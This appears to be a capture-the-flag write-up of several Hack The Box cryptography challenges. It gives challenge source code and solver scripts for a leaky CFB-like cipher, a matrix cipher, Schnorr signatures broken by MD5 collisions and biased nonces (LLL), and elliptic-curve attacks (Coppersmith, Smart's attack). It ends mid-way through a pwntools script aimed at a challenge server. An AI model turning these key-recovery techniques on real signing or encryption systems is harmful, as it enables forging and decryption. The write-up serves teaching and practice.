 blocks = self.blockify(message, 16)
 for block in blocks:
 ct = self.cipher.encrypt(plaintext)
 encrypted_block = self.xor(block, ct)
 ciphertext += encrypted_block
 plaintext = encrypted_block

 return ciphertext

 def leak(self, blocks):
 r = random.randint(0, len(blocks) - 2)
 leak = [self.cipher.encrypt(blocks[i]).hex() for i in [r, r + 1]]
 return r, leak


def main():
 aes = CAES()
 message = pad(FLAG * 4, 16)

 ciphertext = aes.encrypt(message)
 ciphertext_blocks = aes.blockify(ciphertext, 16)

 r, leak = aes.leak(ciphertext_blocks)

 with open('output.txt', 'w') as f:
 f.write(f'ct = {ciphertext.hex()}\nr = {r}\nphrases = {leak}\n')


if __name__ == "__main__":
 main()

We also have an output file:

ct = bc9bc77a809b7f618522d36ef7765e1cad359eef39f0eaa5dc5d85f3ab249e788c9bc36e11d72eee281d1a645027bd96a363c0e24efc6b5caa552b2df4979a5ad41e405576d415a5272ba730e27c593eb2c725031a52b7aa92df4c4e26f116c631630b5d23f11775804a688e5e4d5624
r = 3
phrases = ['8b6973611d8b62941043f85cd1483244', 'cf8f71416111f1e8cdee791151c222ad']

Problem Statement

This code defines a class called CAES that implements the AES encryption algorithm in ECB mode. The CAES class has methods to blockify a message into 16-byte blocks, xor two byte arrays, and encrypt a message using AES in ECB mode. Additionally, it has a method called leak that generates a random integer r and returns the encryption of two randomly chosen adjacent 16-byte blocks. The main function of this code creates an instance of the CAES class, generates a message by padded FLAG*4, encrypts the message, and generates a leak using the leak method of the CAES class. Finally, the main function writes the ciphertext, the randomly chosen integer r, and the leak to a file called output.txt.

Initial Analysis

The encryption method

The encrypt() method is not in ECB mode, it’s similar to CBC, which can be visualized by this graph:

The Leaked Data

The leak method extracts 2 consecutives blocks of ciphertext and encrypted them using ECB mode. Our leaked data is of ciphertext block 3th and 4th. By using the graph above, we can easily see where the leak data comes from and how to use it to break the system, here is the new graph:

Solution Method

The work is simple, just to xor the c[4] with Leak[0] and xor c[5] with Leak[1], then we can recover the plaintext m[4] and m[5], respectively. They must be parts of, or entire flag (in any order).

Here is the script:

def xor(a, b):
 return b''.join([bytes([_a ^ _b]) for _a, _b in zip(a, b)])

def blockify(message, size):
 return [message[i:i + size] for i in range(0, len(message), size)]
ct = 'bc9bc77a809b7f618522d36ef7765e1cad359eef39f0eaa5dc5d85f3ab249e788c9bc36e11d72eee281d1a645027bd96a363c0e24efc6b5caa552b2df4979a5ad41e405576d415a5272ba730e27c593eb2c725031a52b7aa92df4c4e26f116c631630b5d23f11775804a688e5e4d5624'
r = 3
Leak = ['8b6973611d8b62941043f85cd1483244', 'cf8f71416111f1e8cdee791151c222ad']
Leak = [bytes.fromhex(x) for x in Leak]
c = blockify(ct, 32)

c = [bytes.fromhex(x) for x in c]
print(xor(c[4], Leak[0]) + xor(c[5], Leak[1]))

Results

Here is the result: b'_w34k_w17h_l34kz}HTB{CFB_15_w34k'

Flag is: HTB{CFB_15_w34k_w34k_w17h_l34kz}

Inside the Matrix

Given file: Get it here!
Description: As you deciphered the Matrix, you discovered that the astronomy scientist had observed that certain stars were not real. He had created two 5x5 matrices with values based on the time the stars were bright, but after some time, the stars stopped emitting light. Nonetheless, he had managed to capture every matrix until then and created an algorithm that simulated their generation. However, he could not understand what was hidden behind them as he was missing something. He believed that if he could understand the stars, he would be able to locate the secret tombs where the relic was hidden.
Category: Cryptography
Difficulty: Easy

The server script is shown below:

from sage.all_cmdline import *
# from utils import ascii_print
import os

FLAG = b"HTB{????????????????????}"
assert len(FLAG) == 25


class Book:

 def __init__(self):
 self.size = 5
 self.prime = None

 def parse(self, pt: bytes):
 pt = [b for b in pt]
 return matrix(GF(self.prime), self.size, self.size, pt)

 def generate(self):
 key = os.urandom(self.size**2)
 return self.parse(key)

 def rotate(self):
 self.prime = random_prime(2**6, False, 2**4)

 def encrypt(self, message: bytes):
 self.rotate()
 key = self.generate()
 message = self.parse(message)
 ciphertext = message * key
 return ciphertext, key


def menu():
 print("Options:\n")
 print("[L]ook at page")
 print("[T]urn page")
 print("[C]heat\n")
 option = input("> ")
 return option


def main():
 book = Book()
 ciphertext, key = book.encrypt(FLAG)
 page_number = 1

 while True:
 option = menu()
 if option == "L":
 # ascii_print(ciphertext, key, page_number)
 print(ciphertext, key, page_number)
 elif option == "T":
 ciphertext, key = book.encrypt(FLAG)
 page_number += 2
 print()
 elif option == "C":
 print(f"\n{list(ciphertext)}\n{list(key)}\n")
 else:
 print("\nInvalid option!\n")


if __name__ == "__main__":
 try:
 main()
 except Exception as e:
 print(f"An error occurred: {e}")

Problem Statement

The code defines a class Book that is used to generate a key matrix and encrypt a message using matrix multiplication. The matrix is generated randomly each time a message is encrypted, and its size is fixed at $5\times 5$. The program encrypts a flag, stored in FLAG, using the Book class and presents a menu to the user to interact with the encrypted flag.

The main function of the code presents a menu to the user with three options:

[L]ook at page: displays the ciphertext and key matrix for the current page number. Here is an example output when you choose this option:

Options:

[L]ook at page
[T]urn page
[C]heat

> L

 _________ _________
 ______/ 5\ / 6 \_______
 /| --------------- | --------------- |\
|| Ciphertext:--- - | Key:------------ |||
|| ---------------- | ------ -------- |||
|| ---------- ----- | ---------------- |||
|| [3,12,21,20,8]-- | [18,18,21,26,24] |||
|| [1,1,9,7,1]----- | [21,7,10,9,2]--- |||
|| [10,3,8,6,13]--- | [22,1,24,22,12]- |||
|| [0,19,24,15,12]- | [7,21,7,20,2]--- |||
|| [10,4,6,2,4]---- | [26,25,17,3,25]- |||
|| ---------------- | ------ ----- --- |||
|| --- - ---------- | ---------------- |||
||______________ _ | ________________|||
L/______/---------\\_//W--------\_______\J

[T]urn page: generates a new key matrix and ciphertext for the next page number.
[C]heat: displays the ciphertext and key matrix in list type. The Cheat output of above example page is:

[(3, 12, 21, 20, 8), (1, 1, 9, 7, 1), (10, 3, 8, 6, 13), (0, 19, 24, 15, 12), (10, 4, 6, 2, 4)]
[(18, 18, 21, 26, 24), (21, 7, 10, 9, 2), (22, 1, 24, 22, 12), (7, 21, 7, 20, 2), (26, 25, 17, 3, 25)]

Initial Analysis

Primes

Prime $p$ is changed whenever Turn page option is chosen. Though we don’t know what $p$ is, we know that it would be from 16 to 64. There are 12 primes in this range, which are $17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61$.

The Encryption

It’s just a multiplication between two $5 \times 5$ matrixs over the field of integers modulo $p$:

$$C \equiv M\times K (\text{mod } p)$$

$$\Leftrightarrow M \equiv C\times K^{-1} (\text{mod } p)$$

Conclusion

We already have key $K$ and ciphertext $C$ by using Cheat option. Then if we know $p$, we can easily recover message $M$ in modulus $p$. Because $p$ is changeable, we can gather several pairs $(M_i, p_i)$ where $i \geq 2$.

Solution Method

Suppose there are some entries in a key $K_1$ which are larger than 59, then $p_1$ must be 61.

Suppose all entries in a key $K_2$ are smaller than 17, then it’s likely that $p_2$ is 17.

If we have $K_1$ and $K_2$, then we can recover $M_1$, $M_2$. By applying CRT (Chinese Remainder Theorem) for 2 pairs $(M_1, 61)$ and $(M_2, 17)$, we can get $M$ in modulus $61\times 17 = 1037$. Because every entries of the actual message’s matrix are bytes, they would be smaller than 128 (which is much smaller than 1037). This means our $M$ is actually the message itself.

So our mission is just to find $C_1, C_2$ by using Turn page many times. Here is the script after we gather enough materials (I used $p_1=61$ and $p_2=19$):

M_1 = [11, 23, 5, 1, 47, 48, 48, 46, 34, 3, 55, 34, 55, 43, 51, 34, 54, 55, 52, 53, 54, 33, 33, 33, 3]
M_2 = [15, 8, 9, 9, 13, 10, 10, 12, 0, 7,2, 0, 17, 9, 13,0, 1, 2, 14, 0,1, 14, 14, 14, 11]
res = []
from sympy.ntheory.modular import crt
for i in range(len(M_1)):
 m = [61, 19]
 v = [M_1[i], M_2[i]]
# Use crt() method 
 crt_m_v = crt(m, v)[0]
 res.append(crt_m_v)
print(''.join([chr(x) for x in res]))

Results

Flag is: HTB{l00k_@t_7h3_st4rs!!!}

Colliding Heritage

Description: As you arrive at the location of the relic, you discover an ancient tomb that appears to have no visible entrance. However, a scan of the area reveals the presence of unusual RF signals coming from a specific location. With the help of your team, you manage to create an interface to communicate with the signal-emitting device. Unfortunately, the device only grants access to descendants of the pharaoh’s left hand. Can you find a way to enter the tomb?
Category: Cryptography
Difficulty: Medium

We were given a file below:

#!/usr/bin/env python3

import signal
from secrets import randbelow
from hashlib import md5
from Crypto.Util.number import isPrime, getPrime, long_to_bytes, bytes_to_long

FLAG = "HTB{???????????????????????????}"

class MD5chnorr:

 def __init__(self):
 # while True:
 # self.q = getPrime(128)
 # self.p = 2*self.q + 1
 # if isPrime(self.p):
 # break
 self.p = 0x16dd987483c08aefa88f28147702e51eb
 self.q = (self.p - 1) // 2
 self.g = 3
 self.x = randbelow(self.q)
 self.y = pow(self.g, self.x, self.p)

 def H(self, msg):
 return bytes_to_long(md5(msg).digest()) % self.q

 def sign(self, msg):
 k = self.H(msg + long_to_bytes(self.x))
 print(f'{k = }')
 r = pow(self.g, k, self.p) % self.q
 e = self.H(long_to_bytes(r) + msg)
 s = (k - self.x * e) % self.q
 return (s, e)

 def verify(self, msg, sig):
 s, e = sig
 if not (0 < s < self.q):
 return False
 if not (0 < e < self.q):
 return False
 rv = pow(self.g, s, self.p) * pow(self.y, e, self.p) % self.p % self.q
 ev = self.H(long_to_bytes(rv) + msg)
 return ev == e

def menu():
 print('[S]ign a message')
 print('[V]erify a signature')
 return input('> ').upper()[0]

def main():
 md5chnorr = MD5chnorr()
 print('g:', md5chnorr.g)
 print('y:', md5chnorr.y)
 print('p:', md5chnorr.p)

 for _ in range(3):
 choice = menu()

 if choice == 'S':
 msg = bytes.fromhex(input('Enter message> '))
 if b'I am the left hand' in msg:
 print('No!')
 else:
 sig = md5chnorr.sign(msg)
 print('Signature:', sig)

 elif choice == 'V':
 msg = bytes.fromhex(input('Enter message> '))
 s = int(input('Enter s> '))
 e = int(input('Enter e> '))
 if md5chnorr.verify(msg, (s, e)):
 if msg == b'I am the left hand':
 print(FLAG)
 else:
 print('Valid signature!')
 else:
 print('Invalid signature!')

 else:
 print('Invalid choice...')

if __name__ == '__main__':
 signal.alarm(30)
 main()

Initial Analysis

This challenge implements the Schnorr signature. We were given 4 parameters including the generator $g$, prime $q,p=2*q+1$ and $y=g^{x} [pq]$. To get the flag, we have to submit to verify function a message with its signature such that there is a string I am the left hand in the message. However we can not create signature for any message that has this string via function sign. To solved this challenge, i create a signature by hand by retriving the private key $x$ in sign function.

Solution

After reading on wiki, i noticed a vulnerability section Key leakage from nonce reuse. If we create two signatures with the same nonce $k$, then we have:

$$s_1= k-xe_1 [q]$$

$$s_2= k-xe_2 [q]$$

Now we can easily get the private key $x$:

$$x = (s_2 - s_1)(e_1e_2)^{-1}[q]$$

But how can we create two signatures with the same $k$? From the source we know that $k$ is actually md5(msg|x). We can submit any $msg$ we want, so i immediately think of creating the md5 identical-prefix collision using Hashclash. Hashclash will help us to find 2 messages of length 64 that has the same md5 hash, therefore md5(msg|x) or $k$ of these messages will be the same.

After getting $x$, with any message that has the required string we can easily compute $k$ and then $r$, create our own signature $e$ and submit to server to get the flag.

Flag is: HTB{w3ll_y3s_bu7_4c7ual1y_n0…}

Elliptic Labyrinth

Given file: Get it here!
Description: As you navigate through the labyrinth inside the tomb, you encounter GPS inaccuracies that make it difficult to determine the correct path to the exit. Can you overcome the technical issues and use your instincts to find your way out of the maze?
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Cryptography
Difficulty: Medium

The server script is shown below:

import os, json
from hashlib import sha256
from random import randint
from Crypto.Util.number import getPrime, long_to_bytes
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
from sage.all_cmdline import *
from secret import FLAG


class ECC:

 def __init__(self, bits):
 self.p = getPrime(bits)
 self.a = randint(1, self.p)
 self.b = randint(1, self.p)

 def gen_random_point(self):
 return EllipticCurve(GF(self.p), [self.a, self.b]).random_point()


def menu():
 print("1. Get parameters of path")
 print("2. Get point in path")
 print("3. Try to exit the labyrinth")
 option = input("> ")
 return option


def main():
 ec = ECC(512)

 while True:
 choice = menu()
 if choice == '1':
 r = randint(ec.p.bit_length() // 3, 2 * ec.p.bit_length() // 3)
 print(
 json.dumps({
 'p': hex(ec.p),
 'a': hex(ec.a >> r),
 'b': hex(ec.b >> r)
 }))
 elif choice == '2':
 A = ec.gen_random_point()
 print(json.dumps({'x': hex(A[0]), 'y': hex(A[1])}))
 elif choice == '3':
 iv = os.urandom(16)
 key = sha256(long_to_bytes(pow(ec.a, ec.b, ec.p))).digest()[:16]
 cipher = AES.new(key, AES.MODE_CBC, iv)
 flag = pad(FLAG, 16)
 print(
 json.dumps({
 'iv': iv.hex(),
 'enc': cipher.encrypt(flag).hex()
 }))
 else:
 print('Bye.')
 exit()

if __name__ == '__main__':
 main()

Problem Statement

The program generates random secret elliptic curve parameters and allows the user to:

Option 1: Obtain the modulus p and a few MSB bits of ECC parameters.
Option 2: Obtain a random point on the curve.
Option 3: Provide the encrypted FLAG.

Our mission is to decrypt the flag.

Initial analysis

What we need to decrypt the flag?

Obviously, we cannot break the AES to find the flag without the key. To recover the key, we need to know all elliptic curve’s parameters, which are a, b and p. We already known p, so what we do is trying to retrieve a and b from the information provided by the server.

Having many points on the curve

Every point $P(x, y)$ belonging to this elliptic curve must satisfy the equation: $y^2 \equiv x^3 + ax + b (\text{mod } p)$. To find a and b in p, we must at least have a system of 2 equations like this. Fortunately, the server allows user to generate many points.

Solution Method

Suppose we have two different points $M(x_m, y_m)$, $N(x_n, y_n)$ in the curve. We recover $a,b$ by below formulas:

$a \equiv (y^2_m - y^2_n - (x^3_m - x^3_n))(x_m - x_n)^{-1} (\text{mod } p)$

$b \equiv y^2_m - x^3_m - ax_m (\text{mod } p)$

The script:

def recover(p, M, N):
 x1, y1 = M
 x2, y2 = N
 a = pow(x1 - x2, -1, p) * (pow(y1, 2, p) - pow(y2, 2, p) - (pow(x1, 3, p) - pow(x2, 3, p))) % p
 b = (pow(y1, 2, p) - pow(x1, 3, p) - a * x1) % p
 return a, b

That’s all! By having a and b, we can easily recover the key and therefore decrypt the FLAG.

from hashlib import sha256
from random import randint
from Crypto.Util.number import getPrime, long_to_bytes
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad

iv = bytes.fromhex(iv)
key = sha256(long_to_bytes(pow(a, b, p))).digest()[:16]
cipher = AES.new(key, AES.MODE_CBC, iv)
enc = bytes.fromhex(enc)
print(cipher.decrypt(enc))

Results

Flag is: HTB{d3fund_s4v3s_th3_d4y!}

Elliptic Labyrinth Revenge

Given file: Get it here!
Description: As you navigate through the labyrinth inside the tomb, you encounter GPS inaccuracies that make it difficult to determine the correct path to the exit. Can you overcome the technical issues and use your instincts to find your way out of the maze?
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Crypto
Difficulty: Hard

This challenge is a modified version of Elliptic Labyrinth to force CTF players solve it in intended way.

The server script is shown below, which has a bit different from the previous version:

import os, json
from hashlib import sha256
from random import randint
from Crypto.Util.number import getPrime, long_to_bytes
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
from sage.all_cmdline import *
from secret import FLAG


class ECC:

 def __init__(self, bits):
 self.p = getPrime(bits)
 self.a = randint(1, self.p)
 self.b = randint(1, self.p)

 def gen_random_point(self):
 return EllipticCurve(GF(self.p), [self.a, self.b]).random_point()


def menu():
 print("1. Get parameters of path")
 print("2. Try to exit the labyrinth")
 option = input("> ")
 return option


def main():
 ec = ECC(512)

 A = ec.gen_random_point()
 print("This is the point you calculated before:")
 print(json.dumps({'x': hex(A[0]), 'y': hex(A[1])}))

 while True:
 choice = menu()
 if choice == '1':
 r = randint(ec.p.bit_length() // 3, 2 * ec.p.bit_length() // 3)
 print(
 json.dumps({
 'p': hex(ec.p),
 'a': hex(ec.a >> r),
 'b': hex(ec.b >> r)
 }))
 elif choice == '2':
 iv = os.urandom(16)
 key = sha256(long_to_bytes(pow(ec.a, ec.b, ec.p))).digest()[:16]
 cipher = AES.new(key, AES.MODE_CBC, iv)
 flag = pad(FLAG, 16)
 print(
 json.dumps({
 'iv': iv.hex(),
 'enc': cipher.encrypt(flag).hex()
 }))
 else:
 print('Bye.')
 exit()


if __name__ == '__main__':
 main()

Problem Statement

The program generates random secret elliptic curve parameters and allows the user to:

Option 1: Obtain the modulus p and a few MSB bits of ECC parameters.
Option 2: Provide the encrypted FLAG.

Unlike the previous one, now the server doesn’t provide an option to generate random points, instead it gives players only one point at the beginning. The objective is to recover curve’s parameters given a single point of the curve, p and the most significant bits of a and b.

Initial Analysis

AES Encryption

Easily see that the AES scheme is normal and therefore we can exploit anything from it. The only way to retrieve the FLAG is finding the key, which means finding the curve’s parameters.

Leak Bits

For some $170 \leq r \leq 340$, let’s define $a_{h}$ and $b_h$ as the $r$ MSB bits of $a$ and $b$, define $a_l$ and $b_l$ as the remaining bits of $a$ and $b$, respectively. By our definition, we have:

$a = a_h \times 2^r + a_l$

$b = b_h \times 2^r + b_l$

Substitute $a$ and $b$ to the Weierstrass elliptic curve equation, we get:

$y^2 \equiv x^3 + (2^ra_h + a_l)x + 2^rb_h + b_l \text{ (mod }p)$

We define a polynomial $F(\alpha, \beta)$ in $GF(p)$ satifies $F(a_l, b_l) = 0$:

$F(\alpha, \beta) = x_P\alpha + \beta + 2^r a_h \times x_P + 2^rb_h\times x_P - y^2_P$

where $(x_P, y_P)$ is the known point given by the server at beginning. When having most significant bits of a number known, a typical method to apply is Coppersmith, particularly bivariate polynomial Coppersmith in this time.

Implementation and Results

By connecting to the server, I received these information:

p = 0xe3b0aa3465a71f45fdd6350587d041c481ae061401465aa9e089827ac0548728771f6baf095b5f44bb8410dc9709ea22df72bf635f04475fedeb24f13d488ceb
a_h = 0x3128114d5bdecf9388699fd05d1432d444f9e8bda4e620b13445d6f9705721d7dff1
b_h = 0x2cf39f8fd105112fdaa7c7144f3e7e7da15e93fa59efc32b2c185bf5151153e7fd07
x_P = 0x266dd3ba72bad801e16d03509ae1656b0f137c2382f40a420ff90e40f291073b46ae395f2858ccd719299d786c8191796f882daf2a55760d9c58fbcb6c5355da
y_P = 0x7c24c560a9bf720ff447de5671342787c762508e44a2e269ed0794e5ef33f9014f1dd53d8a3ebcb301d5fecdfde4d2413ee079b0ad8e716729c0123787d7fa4d

iv = "8ace74afe026aab8ff1288a9076141fb"
enc = "a07c4ac6d8dc0abe11d955a79e37d8b21721704dfccf6f3938646c74b1c3374f6d0f8e71962e48c405c629533c804ea0"

The good implementation of multivariate Coppersmith I used is in this repo of Defund:

import itertools

def small_roots(f, bounds, m=1, d=None):
 if not d:
 d = f.degree()

 R = f.base_ring()
 N = R.cardinality()

 f /= f.coefficients().pop(0)
 f = f.change_ring(ZZ)

 G = Sequence([], f.parent())
 for i in range(m+1):
 base = N^(m-i) * f^i
 for shifts in itertools.product(range(d), repeat=f.nvariables()):
 g = base * prod(map(power, f.variables(), shifts))
 G.append(g)

 B, monomials = G.coefficient_matrix()
 monomials = vector(monomials)

 factors = [monomial(*bounds) for monomial in monomials]
 for i, factor in enumerate(factors):
 B.rescale_col(i, factor)

 B = B.dense_matrix().LLL()

 B = B.change_ring(QQ)
 for i, factor in enumerate(factors):
 B.rescale_col(i, 1/factor)

 H = Sequence([], f.parent().change_ring(QQ))
 for h in filter(None, B*monomials):
 H.append(h)
 I = H.ideal()
 if I.dimension() == -1:
 H.pop()
 elif I.dimension() == 0:
 roots = []
 for root in I.variety(ring=ZZ):
 root = tuple(R(root[var]) for var in f.variables())
 roots.append(root)
 return roots
 return []

r = len(bin(p)) - len(bin(a_h))
Fp = GF(p)
a_h, b_h, x_P, y_P = map(Fp, [a_h, b_h, x_P, y_P])
P.<alpha, beta> = PolynomialRing(Fp)

F = x_P * alpha + beta + x_P^3 + 2^r * a_h * x_P + 2^r * b_h - y_P^2
roots = small_roots(F, (2^r, 2^r), m=2, d=5)[0]
a_l, b_l = roots
print(f'a_l = {a_l}')
print(f'b_l = {b_l}')

The results:

a_l = 4090003137759760265604501674930222345811449862978588668280246527938919495
b_l = 6854882327443898686047723082547152279783184053818145063785025112346556672

After recovering x_l and y_l, I decrypted the FLAG by this script:

from hashlib import sha256
from random import randint
from Crypto.Util.number import getPrime, long_to_bytes
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad

a = (a_h << 242) + a_l
b = (b_h << 242) + b_l

iv = bytes.fromhex(iv)
key = sha256(long_to_bytes(pow(a, b, p))).digest()[:16]
cipher = AES.new(key, AES.MODE_CBC, iv)
enc = bytes.fromhex(enc)
print(cipher.decrypt(enc))

Flag is: HTB{y0u_5h0u1d_h4v3_u53d_c00p325m17h}

Biased Heritage

Given file: Get it here!
Description: You emerge from the labyrinth to find a massive door blocking your path to the relic. It has the same authentication mechanism as the entrance, but it appears to be more sophisticated and challenging to crack. Can you devise a plan to breach the door and gain access to the relic?
Category: Cryptography
Difficulty: Hard

Compared to the last challenge (Colliding Heritage), k is now generated by SHA256 insteads which is much more resilient against hash collision attacks than MD5 or nearly impossible to do so. Because of that, our previous attack wouldn’t work on this challenge.

After noticing the word BIASED in the challenge name, I had a hunch that this chall gonna need some LLL magic. Based on that, I kept looking for a small integer or atleast any repetitive parts of a number (or so called bias), and found one in the followng hashing function.

def H(self, msg):
 return bytes_to_long(2 * sha256(msg).digest()) % self.q

You can easily see that k = 2*SHA256( msg || secret ). In other words, k = (2^256+1)\*x where x is unknown 256-bit output from SHA256 function while k is 512-bit. Bingo, LLL time.

Well, the server allows us to query for 3 times, we should use the first 2 times to collect signatures which are just enough for our use and the last ones to trick the server into giving us the flag. So we got:

Since S is known 512-bit, and k only has 256 unknown bits we can start constructing a lattice to solve the SVP problem with LLL now.

After LLL, we gonna get a short vector that look like this:

Well, that was alot. Here comes the script in Sage (I parsed signature and submitted signatures all by hands):

from hashlib import sha256
from Crypto.Util.number import *

##get 2 signature from server 
sig0 = (2201384718072843790141885598870601009149158537568071358193592308444053168306421929467556420242693286691490522215468964110881851509880735493338991645390396, 2318623387388989624095214099569047825341708399431253151627450383635519224666598718188372928127571765685778247137818236688391434765968118358634695411837390)
sig1 = (5643323405968098617359379045374815314162245377024975944768494215044558381083529231024356935255866448701807811319414715896126937899577482072265546826687923, 1027133811051642261997157563892411730891386064630632377323975878292520406108099727744365069912026927564457147136857066971987676141520708801237151093219205)
s_temp= [sig0[0], sig1[0]]
e_temp= [sig0[1], sig1[1]]
# q prime
q= [10183765261512984706477412009638081602843766654569849535936436797593873507566983996455981325952833624810053852919430991796953569087107929681393648627640673]
preal = 0x184e26a581fca2893b2096528eb6103ac03f60b023e1284ebda3ab24ad9a9fe0e37b33eeecc4b3c3b9e50832fd856e9889f6c9a10cde54ee798a7c383d0d8d2c3
g=3
s0= s_temp[0]*inverse(e_temp[0],q[0]) % q[0]
s1= s_temp[1]*inverse(e_temp[1],q[0]) % q[0]
temp0 = (2**256+1)*inverse(e_temp[0],q[0]) % q[0]
temp1 = (2**256+1)*inverse(e_temp[1],q[0]) % q[0]
S = (s0-s1) % q[0]

m = Matrix([[1/2^256,0,0,-temp0],
 [0,1/2^256,0,temp1],
 [0,0,1,S],
 [0,0,0,q[0]]])


res = m.LLL()

def H(msg):
 return bytes_to_long(2 * sha256(msg).digest()) % q[0]

def sign(x, msg):
 print("q0 here", q[0])
 k = H(msg + long_to_bytes(x))
 r = int(pow(3,k,preal)) % q[0]
 e = H(long_to_bytes(r) + msg)
 s = (k - x * e) % q[0]
 return (s, e)

for row in res:
 if row[2] == 1 or row[2] == -1:
 k0 = row[0]
 if k0.numerator() < 0:
 k0 = -k0
 k0 = int(k0.numerator())
 k0 = k0*(2^256+1)
 secret = (k0 - s_temp[0]) % q[0]
 secret = int(secret*inverse(e_temp[0],q[0])) % q[0]
 temp = sign(secret,b"")
 assert s_temp[0] == temp[0]
 assert e_temp[0] == temp[1]

 print(b"right hand".hex())
 print(sign(secret,b"right hand"))

Flag is: HTB{full_s1z3_n0nc3_l4cks_ful1_s1z3_3ntr0py}

Converging Visions

Description: As you hold the relic in your hands, it prompts you to input a coordinate. The ancient scriptures you uncovered near the pharaoh’s tomb reveal that the artifact is capable of transmitting the locations of vessels. The initial coordinate must be within proximity of the vessels, and an algorithm will then calculate their precise locations for transmission. However, you soon discover that the coordinates transmitted are not correct, and are encrypted using advanced alien techniques to prevent unauthorized access. It becomes clear that the true coordinates are hidden, serving only to authenticate those with knowledge of the artifact’s secrets. Can you decipher this alien encryption and uncover the genuine coordinates to locate the vessels and destroy them?
Category: Cryptography
Difficulty: Hard

We are given a Python script.

from secret import FLAG, p, a, b
from sage.all_cmdline import *

class PRNG:

 def __init__(self, p, mul1, mul2):
 self.mod = p * 6089788258325039501929073418355467714844813056959443481824909430411674443639248386564763122373451773381582660411059922334086996696436657009055324008041039
 self.exp = 2
 self.mul1 = mul1
 self.mul2 = mul2
 self.inc = int.from_bytes(b'Coordinates lost in space', 'big')
 self.seed = randint(2, self.mod - 1)

 def rotate(self):
 self.seed = (self.mul1 * pow(self.seed, 3) + self.mul2 * self.seed +
 self.inc) % self.mod
 return self.seed, pow(self.seed, self.exp, self.mod)


class Relic:

 def __init__(self, p, a, b):
 self.E = EllipticCurve(GF(p), [a, b])
 self.P = None
 self.EP = None
 self.p = p
 self.prng = PRNG(p, a, b)

 def setupPoints(self, x):
 if x >= self.p:
 return 'Coordinate greater than curve modulus'

 try:
 self.P = self.E.lift_x(Integer(x))
 self.EP = self.P
 except:
 return 'Point not on curve'

 return ('Point confirmed on curve', self.P[0], self.P[1])

 def nextPoints(self):
 seed, enc_seed = self.prng.rotate()
 self.P *= seed
 self.EP *= enc_seed
 return ('New Points', self.EP[0], self.EP[1], self.P[0], self.P[1])


def menu():
 print('Options:\n')
 print('1. Setup Point')
 print('2. Receive new point')
 print('3. Find true point')
 option = input('> ')
 return option


def main():
 artifact = Relic(p, a, b)
 setup = False
 while True:
 try:
 option = menu()
 if option == '1':
 print('Enter x coordinate')
 x = int(input('x: '))
 response = artifact.setupPoints(x)
 if response[0] == 'Point confirmed on curve':
 setup = True
 print(response)
 elif option == '2':
 if setup:
 response = artifact.nextPoints()
 print('Response')
 print((response[0], response[1], response[2]))
 else:
 print('Configure origin point first')
 elif option == '3':
 if setup:
 print('Input x,y')
 Px = int(input('x: '))
 Py = int(input('y: '))
 response = artifact.nextPoints()
 if response[3] == Px and response[4] == Py:
 print(
 'You have confirmed the location. It\'s dangerous however to go alone. Take this: ',
 FLAG)
 else:
 print('The vessels will never be found...')
 exit()
 else:
 print('Configure origin point first')
 else:
 print("Invalid option, sutting down")
 exit()
 except Exception as e:
 response = f'An error occured: {e}'
 print(response)
 exit()


if __name__ == '__main__':
 assert p.bit_length() == 256
 main()

So, for any $i\neq j$, $$a \equiv \dfrac{Y_i^2-Y_j^2-X_i^3+X_j^3}{X_i-X_j} \pmod{p}$$

Which means for any distinct $i,j,k,l$, $$(Y_i^2-Y_j^2-X_i^3+X_j^3)(X_k-X_l)-(Y_k^2-Y_l^2-X_k^3+X_l^3)(X_i-X_j) \equiv 0 \pmod{p}$$

So by playing with several $i,j,k,l$ and take GCD stuff, we obtain $$p=91720173941422125335466921700213991383508377854521057423162397714341988797837$$.

Also, we can find $a$ and $b$ by consider the equation system $$Y_i^2-X_i^3=aX_i+b \text{ for }i=1,2$$.

We get that $$a=57186237363769678415558546920636910250184560730836527033755705455333464722170$$, $$b=47572366756434660406002599832623767973471965640106574131304711893212728437629$$

Now the important thing is to note that: $|E/\mathbb{F}_p|=p$, thus we can easily solve the discrete log problem on $E$ using Smart's attack. In addition, we only need to consider the RNG in modulo $p$.

Back to the challenge, we see the challenge is almost equivalent: Given $P,x^2\times P$, find $(ax^3+bx+C)\times P$. To do this, we need to find $x$ .Fortunately, because the DL problem is easy, we can easily find $x$. The attack is described as follow:

Let $P$ be any point on the curve.
Let the current round be $i$, we can use Option 2 to get the value $r[i]^2\times P$. At this time, $state.P=r[i]\times P$.
Use Smart’s attack to restore $r[i]^2$, then restore $r[i]$ with probability $\dfrac{1}{2}$.
Calculate $predict=ar[i]^3+br[i]+C \pmod{p}$.
Use Option 1 and enter the coordinate of $P[1]$. This will set $state.P=P$ and the next point will be equal to $r[i+1]\times P$.
Enter Option 3 and enter the coordinates of $predict\times P[1]$.

The attack has $\dfrac{1}{2}$ probability of success because we have $\dfrac{1}{2}$ probability of getting the right $r[i]$. So by doing this multiple times, we get the flag.

Flag is: HTB{0Racl3_AS_a_f3A7Ur3_0n_W3aK_CURV3_aND_PRN9??_7H3_s3cur17Y_0F_0uR_CRyP70Sys73M_w1LL_c0LLAp53!!!}

Blokechain

Given file: Get it here!
Description: After successfully locating the vessels and obtaining the relic, you and your team begin to strategize on how to destroy them. However, upon further examination, it becomes clear that the vessels are connected with advanced alien technology that simulates a blockchain. In order to destroy the pods, you realize that you need to possess the wealth of the entire galaxy. The fate of the Earth rests on your ability to find a solution to this seemingly impossible problem. Can you devise a plan to destroy the vessels and save humanity from their destructive power? Note: This challenge is not intended for beginners. It is an insane level of difficulty. Good luck and have fun!
Category: Cryptography
Difficulty: Insane

This challenge has an unintended solution where you can just resubmit the hash, lmao. R.I.P overthinkers.

Here is the script:

from pwn import *

r = remote("178.62.9.10",30794)
total = 0
while total < 100000000:
 r.recvuntil("vessels\n")
 r.sendline("1")

 r.recvuntil("vessels\n")
 r.sendline("2")

 for i in range(60):
 r.recvuntil(": ")
 r.sendline("1")

 ans = []
 while True:
 temp = r.recvline()
 if b"Balance" in temp:
 break
 else:
 temp = temp[len("expected hash "):len("expected hash ")+25].decode()
 ans.append(int(temp,16))
 r.recvuntil("vessels\n")
 r.sendline("2")
 ans1 = [1]*(60-len(ans))
 ans1 = ans1 + ans
 for i in range(60):
